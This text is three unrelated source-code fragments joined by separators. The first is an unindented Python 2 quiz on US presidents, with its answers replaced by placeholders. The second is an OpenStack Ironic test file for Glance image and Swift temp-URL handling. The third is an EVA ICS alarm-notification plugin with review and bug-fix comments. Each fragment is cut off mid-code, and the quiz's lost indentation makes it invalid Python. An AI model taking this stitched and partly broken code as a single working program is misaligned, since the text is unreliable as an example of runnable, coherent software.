QA = raw_input("Who is the 9th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 8th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 7th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 6th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 5th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 4th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 3rd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 2nd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 1st President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
# Scoring: 45 questions in total; the percentage is rounded to the nearest
# whole number by adding 0.5 before truncating with int().
print str(points) + "/45"
percent1 = float(points)/45.0
percent2 = int((percent1 * 100)+0.5)
print str(percent2) + "%"
if points >= 40:
print "A+"
print "You are a Genius, or maybe just a cheater."
elif points >= 35:
print "A"
print "You are a Super Star, or did you have a peek for a few?"
elif points >= 30:
print "B+"
print "Awesome Job! You beat the Creater!"
elif points >= 25:
print "B"
print "Great Job!"
elif points >= 20:
print "C+"
print "You did pretty well!"
elif points >= 15:
print "C"
print "You are starting to get the hang of this!"
elif points >= 10:
print "D+"
print "Slightly Smarter than the average American"
elif points >= 5:
print "D"
print "You are an average American, try studying who the leaders of your own country were instead of watching TV!"
elif points >= 0:
print "F"
print "What are you, a rock?"
raw_input("Press anything to continue: ")
# keep the best score seen so far
if O_points < points:
O_points = points
# Easter-egg gate: a specific player must confirm ("yes"/"Yes") before the
# next round starts.  With the indentation lost it is unclear whether the
# following round is nested inside this branch -- TODO confirm.
if name == "Jonathan":
while True:
ggez = raw_input("Are you ready? ")
if ggez == "yes":
break
if ggez== "Yes":
break
# second round: restart from 0 points and ask from the 45th downwards
points = 0
QA = raw_input("Who is the 45th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 44th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 43rd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 42nd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 41st President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 40th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 39th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 38th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 37th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 36th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
# NOTE(review): unlike every other question, the correct branch here also
# prints the answer -- looks like a copy-paste slip; left unchanged.
print "<NAME>"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 35th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the | |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import time
from glanceclient import client as glance_client
from glanceclient import exc as glance_exc
import mock
from oslo_config import cfg
from oslo_utils import uuidutils
from six.moves.urllib import parse as urlparse
import testtools
from ironic.common import context
from ironic.common import exception
from ironic.common.glance_service import base_image_service
from ironic.common.glance_service import service_utils
from ironic.common.glance_service.v2 import image_service as glance_v2
from ironic.common import image_service as service
from ironic.tests import base
from ironic.tests.unit import stubs
CONF = cfg.CONF
class NullWriter(object):
    """A no-op writer.

    Used to test ImageService.get, which expects an object exposing a
    ``write`` method; anything handed to this writer is discarded.
    """

    def write(self, *args, **kwargs):
        """Accept and discard any arguments."""
        return None
class TestGlanceSerializer(testtools.TestCase):
    """Tests for ``service_utils._convert``.

    As exercised here, _convert turns the JSON-string-encoded 'mappings'
    and 'block_device_mapping' image properties into native Python lists,
    leaving all other metadata untouched.
    """

    def test_serialize(self):
        # input as it would come from Glance: mapping properties are
        # JSON-encoded strings
        metadata = {'name': 'image1',
                    'is_public': True,
                    'foo': 'bar',
                    'properties': {
                        'prop1': 'propvalue1',
                        'mappings': '['
                        '{"virtual":"aaa","device":"bbb"},'
                        '{"virtual":"xxx","device":"yyy"}]',
                        'block_device_mapping': '['
                        '{"virtual_device":"fake","device_name":"/dev/fake"},'
                        '{"virtual_device":"ephemeral0",'
                        '"device_name":"/dev/fake0"}]'}}
        # same metadata with the two properties decoded into lists of dicts
        expected = {
            'name': 'image1',
            'is_public': True,
            'foo': 'bar',
            'properties': {'prop1': 'propvalue1',
                           'mappings': [
                               {'virtual': 'aaa',
                                'device': 'bbb'},
                               {'virtual': 'xxx',
                                'device': 'yyy'},
                           ],
                           'block_device_mapping': [
                               {'virtual_device': 'fake',
                                'device_name': '/dev/fake'},
                               {'virtual_device': 'ephemeral0',
                                'device_name': '/dev/fake0'}
                           ]
                           }
        }
        converted = service_utils._convert(metadata)
        self.assertEqual(expected, converted)
class TestGlanceImageService(base.TestCase):
    """Tests for the Glance image service wrapper (v1 client).

    Covers metadata translation in ``show``, download retry and
    direct-url forwarding behaviour, exception translation, and the
    ``check_image_service`` decorator's lazy client construction.
    """

    # the same timestamp in the old and new Glance wire formats, plus the
    # datetime both should parse to
    NOW_GLANCE_OLD_FORMAT = "2010-10-11T10:30:22"
    NOW_GLANCE_FORMAT = "2010-10-11T10:30:22.000000"
    NOW_DATETIME = datetime.datetime(2010, 10, 11, 10, 30, 22)
    def setUp(self):
        super(TestGlanceImageService, self).setUp()
        client = stubs.StubGlanceClient()
        self.context = context.RequestContext(auth_token=True)
        self.context.user_id = 'fake'
        self.context.project_id = 'fake'
        self.service = service.GlanceImageService(client, 1, self.context)
        self.config(glance_host='localhost', group='glance')
        try:
            self.config(auth_strategy='keystone', group='glance')
        except Exception:
            # the option is not registered yet in this configuration:
            # register it with the desired value as its default instead
            opts = [
                cfg.StrOpt('auth_strategy', default='keystone'),
            ]
            CONF.register_opts(opts)
        # NOTE(review): this `return` is redundant (end of method)
        return
    @staticmethod
    def _make_fixture(**kwargs):
        # build a FakeImage with sane empty defaults, overridden by kwargs
        fixture = {'name': None,
                   'properties': {},
                   'status': None,
                   'is_public': None}
        fixture.update(kwargs)
        return stubs.FakeImage(fixture)
    @property
    def endpoint(self):
        # For glanceclient versions >= 0.13, the endpoint is located
        # under http_client (blueprint common-client-library-2)
        # I5addc38eb2e2dd0be91b566fda7c0d81787ffa75
        # Test both options to keep backward compatibility
        if getattr(self.service.client, 'endpoint', None):
            endpoint = self.service.client.endpoint
        else:
            endpoint = self.service.client.http_client.endpoint
        return endpoint
    def _make_datetime_fixture(self):
        # image fixture whose three timestamps all use the new format
        return self._make_fixture(created_at=self.NOW_GLANCE_FORMAT,
                                  updated_at=self.NOW_GLANCE_FORMAT,
                                  deleted_at=self.NOW_GLANCE_FORMAT)
    def test_show_passes_through_to_client(self):
        image_id = uuidutils.generate_uuid()
        image = self._make_fixture(name='image1', is_public=True,
                                   id=image_id)
        # show() should normalize the image into this full metadata dict,
        # filling absent fields with None
        expected = {
            'id': image_id,
            'name': 'image1',
            'is_public': True,
            'size': None,
            'min_disk': None,
            'min_ram': None,
            'disk_format': None,
            'container_format': None,
            'checksum': None,
            'created_at': None,
            'updated_at': None,
            'deleted_at': None,
            'deleted': None,
            'status': None,
            'properties': {},
            'owner': None,
        }
        with mock.patch.object(self.service, 'call', return_value=image):
            image_meta = self.service.show(image_id)
            self.service.call.assert_called_once_with('get', image_id)
        self.assertEqual(expected, image_meta)
    def test_show_makes_datetimes(self):
        # string timestamps from Glance must come back as datetime objects
        image_id = uuidutils.generate_uuid()
        image = self._make_datetime_fixture()
        with mock.patch.object(self.service, 'call', return_value=image):
            image_meta = self.service.show(image_id)
            self.service.call.assert_called_once_with('get', image_id)
        self.assertEqual(self.NOW_DATETIME, image_meta['created_at'])
        self.assertEqual(self.NOW_DATETIME, image_meta['updated_at'])
    def test_show_raises_when_no_authtoken_in_the_context(self):
        self.context.auth_token = False
        self.assertRaises(exception.ImageNotFound,
                          self.service.show,
                          uuidutils.generate_uuid())
    @mock.patch.object(time, 'sleep', autospec=True)
    def test_download_with_retries(self, mock_sleep):
        # mutable cell so the nested class can count attempts
        tries = [0]
        class MyGlanceStubClient(stubs.StubGlanceClient):
            """A client that fails the first time, then succeeds."""
            def get(self, image_id):
                if tries[0] == 0:
                    tries[0] = 1
                    raise glance_exc.ServiceUnavailable('')
                else:
                    return {}
        stub_client = MyGlanceStubClient()
        stub_context = context.RequestContext(auth_token=True)
        stub_context.user_id = 'fake'
        stub_context.project_id = 'fake'
        stub_service = service.GlanceImageService(stub_client, 1, stub_context)
        image_id = 1  # doesn't matter
        writer = NullWriter()
        # When retries are disabled, we should get an exception
        self.config(glance_num_retries=0, group='glance')
        self.assertRaises(exception.GlanceConnectionFailed,
                          stub_service.download, image_id, writer)
        # Now lets enable retries. No exception should happen now.
        tries = [0]
        self.config(glance_num_retries=1, group='glance')
        stub_service.download(image_id, writer)
        # the retry path must back off between attempts
        self.assertTrue(mock_sleep.called)
    @mock.patch('sendfile.sendfile', autospec=True)
    @mock.patch('os.path.getsize', autospec=True)
    @mock.patch('%s.open' % __name__, new=mock.mock_open(), create=True)
    def test_download_file_url(self, mock_getsize, mock_sendfile):
        # NOTE: only in v2 API
        class MyGlanceStubClient(stubs.StubGlanceClient):
            """A client that returns a file url."""
            s_tmpfname = '/whatever/source'
            def get(self, image_id):
                # NOTE(review): '+' here looks like it was meant to be '%';
                # the resulting 'file://%s/whatever/source' still parses to
                # path '/whatever/source', so the test passes -- confirm
                # before changing.
                return type('GlanceTestDirectUrlMeta', (object,),
                            {'direct_url': 'file://%s' + self.s_tmpfname})
        stub_context = context.RequestContext(auth_token=True)
        stub_context.user_id = 'fake'
        stub_context.project_id = 'fake'
        stub_client = MyGlanceStubClient()
        stub_service = service.GlanceImageService(stub_client,
                                                  context=stub_context,
                                                  version=2)
        image_id = 1  # doesn't matter
        self.config(allowed_direct_url_schemes=['file'], group='glance')
        # patching open in base_image_service module namespace
        # to make call-spec assertions
        with mock.patch('ironic.common.glance_service.base_image_service.open',
                        new=mock.mock_open(), create=True) as mock_ironic_open:
            with open('/whatever/target', 'w') as mock_target_fd:
                stub_service.download(image_id, mock_target_fd)
        # assert the image data was neither read nor written
        # but rather sendfiled
        mock_ironic_open.assert_called_once_with(MyGlanceStubClient.s_tmpfname,
                                                 'r')
        mock_source_fd = mock_ironic_open()
        self.assertFalse(mock_source_fd.read.called)
        self.assertFalse(mock_target_fd.write.called)
        mock_sendfile.assert_called_once_with(
            mock_target_fd.fileno(),
            mock_source_fd.fileno(),
            0,
            mock_getsize(MyGlanceStubClient.s_tmpfname))
    def test_client_forbidden_converts_to_imagenotauthed(self):
        class MyGlanceStubClient(stubs.StubGlanceClient):
            """A client that raises a Forbidden exception."""
            def get(self, image_id):
                raise glance_exc.Forbidden(image_id)
        stub_client = MyGlanceStubClient()
        stub_context = context.RequestContext(auth_token=True)
        stub_context.user_id = 'fake'
        stub_context.project_id = 'fake'
        stub_service = service.GlanceImageService(stub_client, 1, stub_context)
        image_id = 1  # doesn't matter
        writer = NullWriter()
        self.assertRaises(exception.ImageNotAuthorized, stub_service.download,
                          image_id, writer)
    def test_client_httpforbidden_converts_to_imagenotauthed(self):
        class MyGlanceStubClient(stubs.StubGlanceClient):
            """A client that raises a HTTPForbidden exception."""
            def get(self, image_id):
                raise glance_exc.HTTPForbidden(image_id)
        stub_client = MyGlanceStubClient()
        stub_context = context.RequestContext(auth_token=True)
        stub_context.user_id = 'fake'
        stub_context.project_id = 'fake'
        stub_service = service.GlanceImageService(stub_client, 1, stub_context)
        image_id = 1  # doesn't matter
        writer = NullWriter()
        self.assertRaises(exception.ImageNotAuthorized, stub_service.download,
                          image_id, writer)
    def test_client_notfound_converts_to_imagenotfound(self):
        class MyGlanceStubClient(stubs.StubGlanceClient):
            """A client that raises a NotFound exception."""
            def get(self, image_id):
                raise glance_exc.NotFound(image_id)
        stub_client = MyGlanceStubClient()
        stub_context = context.RequestContext(auth_token=True)
        stub_context.user_id = 'fake'
        stub_context.project_id = 'fake'
        stub_service = service.GlanceImageService(stub_client, 1, stub_context)
        image_id = 1  # doesn't matter
        writer = NullWriter()
        self.assertRaises(exception.ImageNotFound, stub_service.download,
                          image_id, writer)
    def test_client_httpnotfound_converts_to_imagenotfound(self):
        class MyGlanceStubClient(stubs.StubGlanceClient):
            """A client that raises a HTTPNotFound exception."""
            def get(self, image_id):
                raise glance_exc.HTTPNotFound(image_id)
        stub_client = MyGlanceStubClient()
        stub_context = context.RequestContext(auth_token=True)
        stub_context.user_id = 'fake'
        stub_context.project_id = 'fake'
        stub_service = service.GlanceImageService(stub_client, 1, stub_context)
        image_id = 1  # doesn't matter
        writer = NullWriter()
        self.assertRaises(exception.ImageNotFound, stub_service.download,
                          image_id, writer)
    def test_check_image_service_client_set(self):
        # with a client already present, the decorator is a pass-through
        def func(self):
            return True
        self.service.client = True
        wrapped_func = base_image_service.check_image_service(func)
        self.assertTrue(wrapped_func(self.service))
    @mock.patch.object(glance_client, 'Client', autospec=True)
    def test_check_image_service__no_client_set_http(self, mock_gclient):
        # with no client set, the decorator must build one from the http
        # image_href and forward args/kwargs untouched
        def func(service, *args, **kwargs):
            return (self.endpoint, args, kwargs)
        endpoint = 'http://123.123.123.123:9292'
        mock_gclient.return_value.endpoint = endpoint
        self.service.client = None
        params = {'image_href': '%s/image_uuid' % endpoint}
        self.config(auth_strategy='keystone', group='glance')
        wrapped_func = base_image_service.check_image_service(func)
        self.assertEqual((endpoint, (), params),
                         wrapped_func(self.service, **params))
        mock_gclient.assert_called_once_with(
            1, endpoint,
            **{'insecure': CONF.glance.glance_api_insecure,
               'token': self.context.auth_token})
    @mock.patch.object(glance_client, 'Client', autospec=True)
    def test_get_image_service__no_client_set_https_insecure(self,
                                                             mock_gclient):
        # https endpoint with certificate verification disabled
        def func(service, *args, **kwargs):
            return (self.endpoint, args, kwargs)
        endpoint = 'https://192.168.127.12:9292'
        mock_gclient.return_value.endpoint = endpoint
        self.service.client = None
        params = {'image_href': '%s/image_uuid' % endpoint}
        self.config(auth_strategy='keystone', group='glance')
        self.config(glance_api_insecure=True, group='glance')
        wrapped_func = base_image_service.check_image_service(func)
        self.assertEqual((endpoint, (), params),
                         wrapped_func(self.service, **params))
        mock_gclient.assert_called_once_with(
            1, endpoint,
            **{'insecure': CONF.glance.glance_api_insecure,
               'token': self.context.auth_token})
    @mock.patch.object(glance_client, 'Client', autospec=True)
    def test_get_image_service__no_client_set_https_secure(self, mock_gclient):
        # https endpoint with a CA file: cacert must be passed through
        def func(service, *args, **kwargs):
            return (self.endpoint, args, kwargs)
        endpoint = 'https://192.168.127.12:9292'
        mock_gclient.return_value.endpoint = endpoint
        self.service.client = None
        params = {'image_href': '%s/image_uuid' % endpoint}
        self.config(auth_strategy='keystone', group='glance')
        self.config(glance_api_insecure=False, group='glance')
        self.config(glance_cafile='/path/to/certfile', group='glance')
        wrapped_func = base_image_service.check_image_service(func)
        self.assertEqual((endpoint, (), params),
                         wrapped_func(self.service, **params))
        mock_gclient.assert_called_once_with(
            1, endpoint,
            **{'cacert': CONF.glance.glance_cafile,
               'insecure': CONF.glance.glance_api_insecure,
               'token': self.context.auth_token})
def _create_failing_glance_client(info):
    """Return a stub Glance client whose first ``get`` call fails.

    The call count is recorded in ``info['num_calls']`` (the caller must
    pre-seed that key); the first call raises ServiceUnavailable, every
    later call returns an empty dict.
    """
    class MyGlanceStubClient(stubs.StubGlanceClient):
        """A client that fails the first time, then succeeds."""
        def get(self, image_id):
            info['num_calls'] += 1
            if info['num_calls'] == 1:
                raise glance_exc.ServiceUnavailable('')
            return {}
    return MyGlanceStubClient()
class TestGlanceSwiftTempURL(base.TestCase):
    """Tests for generating Swift temp-URLs for Glance-backed images.

    Covers plain Swift, radosgw-style endpoints, multi-container stores
    and validation of the temp-URL related configuration options.
    """

    def setUp(self):
        super(TestGlanceSwiftTempURL, self).setUp()
        client = stubs.StubGlanceClient()
        self.context = context.RequestContext()
        self.context.auth_token = 'fake'
        self.service = service.GlanceImageService(client, 2, self.context)
        # a complete, valid temp-URL configuration
        self.config(swift_temp_url_key='correcthorsebatterystaple',
                    group='glance')
        self.config(swift_endpoint_url='https://swift.example.com',
                    group='glance')
        self.config(swift_account='AUTH_a422b2-91f3-2f46-74b7-d7c9e8958f5d30',
                    group='glance')
        self.config(swift_api_version='v1',
                    group='glance')
        self.config(swift_container='glance',
                    group='glance')
        self.config(swift_temp_url_duration=1200,
                    group='glance')
        self.config(swift_store_multiple_containers_seed=0,
                    group='glance')
        self.fake_image = {
            'id': '757274c4-2856-4bd2-bb20-9a4a231e187b'
        }
    @mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
    def test_swift_temp_url(self, tempurl_mock):
        # /<api_version>/<account>/<container>/<image id>
        path = ('/v1/AUTH_a422b2-91f3-2f46-74b7-d7c9e8958f5d30'
                '/glance'
                '/757274c4-2856-4bd2-bb20-9a4a231e187b')
        tempurl_mock.return_value = (
            path + '?temp_url_sig=hmacsig&temp_url_expires=1400001200')
        self.service._validate_temp_url_config = mock.Mock()
        temp_url = self.service.swift_temp_url(image_info=self.fake_image)
        self.assertEqual(CONF.glance.swift_endpoint_url
                         + tempurl_mock.return_value,
                         temp_url)
        tempurl_mock.assert_called_with(
            path=path,
            seconds=CONF.glance.swift_temp_url_duration,
            key=CONF.glance.swift_temp_url_key,
            method='GET')
    @mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
    def test_swift_temp_url_invalid_image_info(self, tempurl_mock):
        # missing or malformed image id must be rejected before any
        # temp-URL generation happens
        self.service._validate_temp_url_config = mock.Mock()
        image_info = {}
        self.assertRaises(exception.ImageUnacceptable,
                          self.service.swift_temp_url, image_info)
        image_info = {'id': 'not an id'}
        self.assertRaises(exception.ImageUnacceptable,
                          self.service.swift_temp_url, image_info)
        self.assertFalse(tempurl_mock.called)
    @mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
    def test_swift_temp_url_radosgw(self, tempurl_mock):
        # radosgw: no account in the path, '/swift' appended to endpoint
        self.config(object_store_endpoint_type='radosgw', group='deploy')
        path = ('/v1'
                '/glance'
                '/757274c4-2856-4bd2-bb20-9a4a231e187b')
        tempurl_mock.return_value = (
            path + '?temp_url_sig=hmacsig&temp_url_expires=1400001200')
        self.service._validate_temp_url_config = mock.Mock()
        temp_url = self.service.swift_temp_url(image_info=self.fake_image)
        self.assertEqual(
            (urlparse.urljoin(CONF.glance.swift_endpoint_url, 'swift') +
             tempurl_mock.return_value),
            temp_url)
        tempurl_mock.assert_called_with(
            path=path,
            seconds=CONF.glance.swift_temp_url_duration,
            key=CONF.glance.swift_temp_url_key,
            method='GET')
    @mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
    def test_swift_temp_url_radosgw_endpoint_with_swift(self, tempurl_mock):
        # endpoint already ends in '/swift': must not be appended again
        self.config(swift_endpoint_url='https://swift.radosgw.com/swift',
                    group='glance')
        self.config(object_store_endpoint_type='radosgw', group='deploy')
        path = ('/v1'
                '/glance'
                '/757274c4-2856-4bd2-bb20-9a4a231e187b')
        tempurl_mock.return_value = (
            path + '?temp_url_sig=hmacsig&temp_url_expires=1400001200')
        self.service._validate_temp_url_config = mock.Mock()
        temp_url = self.service.swift_temp_url(image_info=self.fake_image)
        self.assertEqual(
            CONF.glance.swift_endpoint_url + tempurl_mock.return_value,
            temp_url)
        tempurl_mock.assert_called_with(
            path=path,
            seconds=CONF.glance.swift_temp_url_duration,
            key=CONF.glance.swift_temp_url_key,
            method='GET')
    @mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
    def test_swift_temp_url_radosgw_endpoint_invalid(self, tempurl_mock):
        # a radosgw endpoint with an unexpected path suffix is rejected
        self.config(swift_endpoint_url='https://swift.radosgw.com/eggs/',
                    group='glance')
        self.config(object_store_endpoint_type='radosgw', group='deploy')
        self.service._validate_temp_url_config = mock.Mock()
        self.assertRaises(exception.InvalidParameterValue,
                          self.service.swift_temp_url,
                          self.fake_image)
        self.assertFalse(tempurl_mock.called)
    @mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
    def test_swift_temp_url_multiple_containers(self, tempurl_mock):
        # with a container seed, the container name is suffixed with the
        # first <seed> chars of the image id
        self.config(swift_store_multiple_containers_seed=8,
                    group='glance')
        path = ('/v1/AUTH_a422b2-91f3-2f46-74b7-d7c9e8958f5d30'
                '/glance_757274c4'
                '/757274c4-2856-4bd2-bb20-9a4a231e187b')
        tempurl_mock.return_value = (
            path + '?temp_url_sig=hmacsig&temp_url_expires=1400001200')
        self.service._validate_temp_url_config = mock.Mock()
        temp_url = self.service.swift_temp_url(image_info=self.fake_image)
        self.assertEqual(CONF.glance.swift_endpoint_url
                         + tempurl_mock.return_value,
                         temp_url)
        tempurl_mock.assert_called_with(
            path=path,
            seconds=CONF.glance.swift_temp_url_duration,
            key=CONF.glance.swift_temp_url_key,
            method='GET')
    def test_swift_temp_url_url_bad_no_info(self):
        self.assertRaises(exception.ImageUnacceptable,
                          self.service.swift_temp_url,
                          image_info={})
    def test__validate_temp_url_config(self):
        # the setUp() configuration is fully valid
        self.service._validate_temp_url_config()
    def test__validate_temp_url_key_exception(self):
        self.config(swift_temp_url_key=None, group='glance')
        self.assertRaises(exception.MissingParameterValue,
                          self.service._validate_temp_url_config)
    def test__validate_temp_url_endpoint_config_exception(self):
        self.config(swift_endpoint_url=None, group='glance')
        self.assertRaises(exception.MissingParameterValue,
                          self.service._validate_temp_url_config)
    def test__validate_temp_url_account_exception(self):
        self.config(swift_account=None, group='glance')
        self.assertRaises(exception.MissingParameterValue,
                          self.service._validate_temp_url_config)
    def test__validate_temp_url_no_account_exception_radosgw(self):
        # radosgw does not use the account, so a missing one is fine there
        self.config(swift_account=None, group='glance')
        self.config(object_store_endpoint_type='radosgw', group='deploy')
        self.service._validate_temp_url_config()
    def test__validate_temp_url_endpoint_less_than_download_delay(self):
        # URL lifetime shorter than the expected download start delay
        self.config(swift_temp_url_expected_download_start_delay=1000,
                    group='glance')
        self.config(swift_temp_url_duration=15,
                    group='glance')
        self.assertRaises(exception.InvalidParameterValue,
                          self.service._validate_temp_url_config)
    def test__validate_temp_url_multiple_containers(self):
        # seed must be a non-negative int no longer than the uuid prefix
        self.config(swift_store_multiple_containers_seed=-1,
                    group='glance')
        self.assertRaises(exception.InvalidParameterValue,
                          self.service._validate_temp_url_config)
        self.config(swift_store_multiple_containers_seed=None,
                    group='glance')
        self.assertRaises(exception.InvalidParameterValue,
                          self.service._validate_temp_url_config)
        self.config(swift_store_multiple_containers_seed=33,
                    group='glance')
        self.assertRaises(exception.InvalidParameterValue,
                          self.service._validate_temp_url_config)
class TestSwiftTempUrlCache(base.TestCase):
def setUp(self):
super(TestSwiftTempUrlCache, self).setUp()
| |
# EVA ICS "alarmer" plugin: module metadata, imports and global state.
__author__ = 'Altertech, https://www.altertech.com/'
__copyright__ = 'Copyright (C) 2012-2020 Altertech'
__license__ = 'Apache License 2.0'
__version__ = '0.0.3'
import eva.pluginapi as pa
import sqlalchemy as sa
import threading
import time
from neotasker import g, background_worker
from eva.client import apiclient
from functools import partial
# undocumented internal modules, don't use in own plugins
import eva.mailer
import eva.core
# shorthand for building textual SQL statements
sql = sa.text
from types import SimpleNamespace
# serializes per-task DB connection management (see get_db())
db_lock = threading.RLock()
# plugin-global state: ready flag and the SQLAlchemy engine (set in init());
# init() also adds keep_log / userinfo_email_field / lm depending on product
flags = SimpleNamespace(ready=False, db=None)
logger = pa.get_logger()
# `g` above is an undocumented thread-local, don't use in own plugins
def get_db():
    """Return the task-local DB connection, reconnecting if it went stale.

    The connection is cached on the neotasker task-local object ``g`` as
    ``x_alarmer_db``.  An existing connection is probed with a cheap
    ``select 1``; on failure it is closed and replaced.

    :returns: a live SQLAlchemy connection
    """
    with db_lock:
        if not g.has('x_alarmer_db'):
            g.x_alarmer_db = flags.db.connect()
        else:
            try:
                g.x_alarmer_db.execute('select 1')
            except Exception:
                # BUG FIX: the original closed g.userdb here (a copy-paste
                # slip from another plugin); close the stale alarmer
                # connection instead, then reconnect
                try:
                    g.x_alarmer_db.close()
                except Exception:
                    pass
                g.x_alarmer_db = flags.db.connect()
        return g.x_alarmer_db
def get_level_name(level):
    """Map a numeric alarm level to its display name: 1 -> WARNING, anything
    else -> ALARM."""
    return {1: 'WARNING'}.get(level, 'ALARM')
def notify(alarm_id, level):
    """Trigger an alarm and e-mail the subscribed users.

    Writes a 'T' (triggered) record to alarmer_log, raises the alarm lvar
    to *level* unless it is already at that level or higher, then sends a
    mail to every user subscribed to this alarm at the given level or
    lower.  An alarm whose lvar status is not 1 is considered inactive
    and only logged.

    :param alarm_id: alarm id (lvar "alarmer/<alarm_id>")
    :param level: 1 = WARNING, 2 = ALARM
    :raises: re-raises any error occurring in the notification phase
    """
    level = int(level)
    lv = pa.api_call('state', i=f'lvar:alarmer/{alarm_id}', full=True)
    db = get_db()
    try:
        db.execute(sql(
            'insert into alarmer_log'
            '(u, utp, key_id, alarm_id, description, action, t, level)'
            'values (:u, :utp, :key_id, :alarm_id, :d, :action, :t, :level)'),
                   u='',
                   utp='',
                   key_id='',
                   alarm_id=alarm_id,
                   d=lv['description'],
                   action='T',
                   t=time.time(),
                   level=level)
    except Exception:
        logger.error(f'Unable to insert log record for alarm: {alarm_id}')
        pa.log_traceback()
    try:
        if lv['status'] == 1:
            # current lvar value is the currently-triggered level (0 if unset)
            cur_value = int(lv['value']) if lv['value'] else 0
            if cur_value >= level:
                logger.info('Skipping alarm notifications, '
                            f'already triggered: {alarm_id}')
            else:
                pa.api_call('set', i=f'lvar:alarmer/{alarm_id}', v=level)
                logger.warning('Alarm triggered: '
                               f'{alarm_id}, level: {get_level_name(level)}')
                r = db.execute(sql('select u, utp from alarmer_sub '
                                   'where alarm_id=:i and level<=:level'),
                               i=alarm_id,
                               level=level)
                subject = f'{get_level_name(level)}: {lv["description"]}'
                text = (f'{get_level_name(level)}: {lv["description"]} '
                        f'({alarm_id})\n'
                        f'System: {eva.core.config.system_name}')
                sendmail = partial(eva.mailer.send, subject=subject, text=text)
                while True:
                    ui = r.fetchone()
                    if not ui:
                        break
                    # look up the subscriber's e-mail address in userinfo
                    r2 = db.execute(sql('select value from userinfo where '
                                        'name=:name and u=:u and utp=:utp'),
                                    name=flags.userinfo_email_field,
                                    u=ui.u,
                                    utp=ui.utp)
                    while True:
                        d = r2.fetchone()
                        if not d:
                            break
                        logger.debug(
                            f'sending alarm email to {d.value}')
                        # BUG FIX: the original passed an always-empty
                        # ``recip`` list to every send; deliver to the
                        # address just fetched (if eva.mailer.send requires
                        # a list, use [d.value] -- TODO confirm)
                        sendmail(rcp=d.value)
        else:
            logger.debug(f'Inactive alarm triggered: {alarm_id}')
    except Exception:
        logger.error(f'Unable to send notifications for alarm: {alarm_id}')
        pa.log_traceback()
        raise
def init(config, **kwargs):
    """Plugin entry point: configure the alarmer for the current product.

    :param config: plugin config; keys: db (required), keep_log and
        userinfo_email_field (LM), lm (SFA)
    :raises RuntimeError: if the product is neither LM PLC nor SFA
    """
    logger.debug('alarmer plugin loaded')
    pa.register_apix(APIFuncs(), sys_api=False)
    p = pa.get_product()
    # undocummented internal function, don't use in own plugins
    from eva.core import create_db_engine, format_db_uri
    db = format_db_uri(config['db'])
    flags.db = create_db_engine(db)
    logger.debug(f'alarmer.db = {db}')
    if p.code == 'lm':
        pa.register_lmacro_object('notify', notify)
        flags.keep_log = int(config.get('keep_log', 86400))
        logger.debug(f'alarmer.keep_log = {flags.keep_log}')
        flags.userinfo_email_field = config.get('userinfo_email_field', 'email')
        logger.debug(
            f'alarmer.userinfo_email_field = {flags.userinfo_email_field}')
    elif p.code == 'sfa':
        lm = config['lm']
        if not lm.startswith('lm/'):
            lm = 'lm/' + lm
        logger.debug(f'alarmer.lm = {lm}')
        flags.lm = lm
        # NOTE: the API functions are already registered above; the
        # original registered the same APIX a second time here
    else:
        # BUG FIX: the original constructed this exception without raising
        # it, silently accepting unsupported products
        raise RuntimeError(f'product not supported: {p}')
    flags.ready = True
def before_start(**kwargs):
